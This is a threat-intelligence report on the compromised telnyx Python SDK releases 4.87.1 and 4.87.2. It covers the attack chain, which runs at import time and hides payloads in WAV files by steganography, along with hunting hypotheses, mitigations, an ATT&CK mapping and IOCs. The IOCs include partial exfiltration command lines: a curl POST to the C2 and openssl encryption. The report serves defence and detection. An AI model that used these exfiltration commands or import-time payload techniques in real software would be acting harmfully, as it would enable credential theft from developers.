TeamPCP Compromises Telnyx Python SDK to Deliver Credential-Stealing Malware

Key Takeaways

• Malicious versions 4.87.1 and 4.87.2 of the official telnyx Python SDK were uploaded to PyPI to deliver credential-harvesting malware.
• The attack executes at module import time (src/telnyx/_client.py), successfully bypassing standard PyPI postinstall hook detection.
• The malware uses audio steganography, hiding its second-stage payloads within WAV files (ringtone.wav, hangup.wav) downloaded from the C2.
• It implements OS-specific attack paths: a fileless in-memory harvester on Linux/macOS, and a persistent PE binary (msbuild.exe) dropped in the Startup folder on Windows.
• Exfiltrated data is secured using hybrid encryption (AES-256-CBC and RSA-4096) via system OpenSSL, making it unrecoverable without the threat actor's private key.

Affected Systems

• Linux, macOS, and Windows systems running Python applications that import the compromised telnyx package (versions 4.87.1 and 4.87.2).

Attack Chain

The attack begins when a developer or system imports the compromised telnyx package, triggering malicious code injected into src/telnyx/_client.py. On Windows, it downloads hangup.wav, extracts a PE binary via steganography, and drops it into the Startup folder as msbuild.exe for persistence. On Linux/macOS, it downloads ringtone.wav, extracts a Python script, and executes it filelessly in-memory to harvest credentials. The harvested data is then encrypted using AES-256-CBC and an RSA-4096 public key via OpenSSL, and exfiltrated to the C2 server using curl.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide explicit detection rules, but it details behavioral indicators, file paths, and network IOCs that can be used to build custom detection logic.

Detection Engineering Assessment

EDR Visibility: Medium — While the Linux/macOS execution is fileless and occurs in-memory, the spawning of child Python processes, invocation of system binaries (curl, openssl), and the dropping of a PE file into the Windows Startup folder are highly visible to EDR. Network Visibility: High — C2 communication occurs over plain HTTP on port 8080. The downloading of WAV files and the POST exfiltration with custom headers (X-Filename) are easily observable in network traffic. Detection Difficulty: Moderate — The initial payload is obfuscated and avoids standard PyPI installation hooks, making static detection harder. However, the reliance on system binaries and plain HTTP network traffic provides solid behavioral detection opportunities.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon Event ID 1)
• File Creation (Sysmon Event ID 11)
• Network Connections (Sysmon Event ID 3 / Zeek HTTP logs)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for Python processes spawning child Python processes with '-' as an argument, indicating execution from standard input.	Process Creation	Execution	Low
Search for HTTP GET requests downloading .wav files from non-standard ports (e.g., 8080) using a generic 'Mozilla/5.0' User-Agent.	Network Traffic	Delivery	Medium
Identify file creation events in the Windows Startup folder named 'msbuild.exe', especially if originating from a Python process.	File System	Persistence	Low
Monitor for HTTP POST requests containing the custom header 'X-Filename: tpcp.tar.gz'.	Network Traffic	Exfiltration	Low
Detect Python processes invoking 'openssl' and 'curl' in rapid succession, particularly with output suppression flags.	Process Creation	Exfiltration	Medium

Control Gaps

• PyPI malware scanners relying solely on setup.py or postinstall hooks.
• Static analysis tools failing to decode base64 blobs hidden within standard library imports.

Key Behavioral Indicators

• Python process spawning a detached child process (start_new_session=True).
• Unexpected imports (wave, tempfile, subprocess) in HTTP client modules.
• curl execution with -s -o /dev/null and custom X-Filename header.

False Positive Assessment

• Low. The specific combination of compromised telnyx package versions, hardcoded IPs, unique file paths (msbuild.exe in Startup), and custom HTTP headers makes these indicators highly specific to this threat.

Recommendations

Immediate Mitigation

• Audit environments for telnyx==4.87.1 or 4.87.2 and downgrade to 4.87.0 immediately.
• Rotate all API keys, tokens, SSH keys, and secrets accessible in environments where the compromised package was imported.
• Block IP 83.142.209.203 at the network perimeter.

Infrastructure Hardening

• Implement egress filtering to block outbound connections to non-standard ports (like 8080) from production servers.
• Purge quarantined versions from internal PyPI mirrors and dependency caches.

User Protection

• Inspect Windows hosts for %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe and related lock/tmp files.
• Monitor CI/CD pipelines for exposure during the malicious release window.

Security Awareness

• Educate developers on the risks of supply chain attacks and the importance of pinning dependencies to known good versions.
• Train security teams to look beyond installation hooks for malicious code execution in Python packages.

MITRE ATT&CK Mapping

• T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
• T1059.006 - Command and Scripting Interpreter: Python
• T1027.011 - Obfuscated Files or Information: Steganography
• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1620 - Reflective Code Loading
• T1480.001 - Execution Guardrails: Environmental Keying
• T1573.002 - Encrypted Channel: Asymmetric Cryptography
• T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Additional IOCs

• Ips:
  • 83[.]142[.]209[.]203 - C2 server for payload delivery and exfiltration
• Urls:
  • hxxp://83[.]142[.]209[.]203:8080/ - Receives encrypted exfiltration bundles (tpcp.tar.gz) via POST request
• File Paths:
  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe.lock - Lock file to prevent re-execution of the Windows payload within a 12-hour window
  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe.tmp - Temporary file used during the extraction of the Windows PE binary
  • src/telnyx/_client.py - The specific file within the telnyx package where the malicious code was injected
• Command Lines:
  • Purpose: Execute fileless Python payload from standard input | Tools: python, sys.executable, subprocess | Stage: Execution | subprocess.run([sys.executable, '-'], input=
  • Purpose: Encrypt exfiltrated data using system OpenSSL | Tools: openssl | Stage: Exfiltration | openssl enc -aes-256-cbc
  • Purpose: Exfiltrate encrypted data archive to C2 | Tools: curl | Stage: Exfiltration | curl -s -o /dev/null -H "X-Filename: tpcp.tar.gz" -X POST
• Other:
  • MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+ 08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV pQWpiuQa+UjTkWmC8RDDXO8G/opLGQnuQVvgsZWuT31j/Qop6rtocYsayGzCFrMV 2/ElW1UE20tZWY+5jXonnMdWBmYwzYb5iwymbLtekGEydyLalNzGAPxZgAxgkbSE mSHLau61fChgT9MlnPhCtdXkQRMrI3kZZ4MDPuEEJTSqLr+D3ngr3237G14SRRQB IqIjly5OoFkqJxeNPSGJlt3Ino0qO7fy7LO0Tp9bFvXTOI5c+1lhgo0lScAu1ucA b6Hua+xRQ6s//PzdMgWT3R1aK+TqMHJZTZa8HY0KaiFeVQ3YitWuiZ3ilwCtwhT5 TlS9cBYph8U2Ek4K20qmp1dbFmxm3kS1yQg8MmrBRxOYyjSTQtveSeIlxrbpJhaU Z7eneYC4G/Wl3raZfFwoHtmpFXDxA7HaBUArznP55LD/rZd6gq7lTDrSy5uMXbVt 6ZnKd0IwHbLkYlX0oLeCNF6YOGhgyX9JsgrBxT0eHeGRqOzEZ7rCfCavDISbR5xK J4VRwlUSVsQ8UXt6zIHqg4CKbrVB+WMsRo/FWu6RtcQHdmGPngy+Nvg5USAVljyk rn3JMF0xZyXNRpQ/fZZxl40CAwEAAQ== - Hardcoded RSA-4096 public key used for hybrid encryption of exfiltrated data
  • tpcp.tar.gz - Name of the exfiltrated archive containing stolen credentials
  • telnyx==4.87.2 - Compromised version of the telnyx PyPI package (bugfix release by threat actor)